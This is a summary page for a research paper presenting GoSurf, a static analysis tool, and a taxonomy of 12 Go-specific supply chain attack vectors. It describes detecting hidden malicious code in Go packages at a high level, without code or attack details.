GoSurf: Identifying Software Supply Chain Attack Vectors in Go

TL;DR

GoSurf is a static analysis tool that identifies supply chain attack vectors specific to the Go programming language, helping secure open-source dependencies by revealing hidden malicious code patterns.

Contribution

The paper introduces a novel taxonomy of 12 Go-specific attack vectors and presents GoSurf, a tool for analyzing and detecting these vulnerabilities in Go packages.

Findings

GoSurf successfully identified attack vectors in real-world Go packages.

The taxonomy highlights language features exploitable for malicious purposes.

Preliminary results aid developers in prioritizing security audits.

Abstract

In Go, the widespread adoption of open-source software has led to a flourishing ecosystem of third-party dependencies, which are often integrated into critical systems. However, the reuse of dependencies introduces significant supply chain security risks, as a single compromised package can have cascading impacts. Existing supply chain attack taxonomies overlook language-specific features that can be exploited by attackers to hide malicious code. In this paper, we propose a novel taxonomy of 12 distinct attack vectors tailored for the Go language and its package lifecycle. Our taxonomy identifies patterns in which language-specific Go features, intended for benign purposes, can be misused to propagate malicious code stealthily through supply chains. Additionally, we introduce GoSurf, a static analysis tool that analyzes the attack surface of Go packages according to our proposed taxonomy. We evaluate GoSurf on a corpus of widely used, real-world Go packages. Our work provides preliminary insights for securing the open-source software supply chain within the Go ecosystem, allowing developers and security analysts to prioritize code audit efforts and uncover hidden malicious behaviors.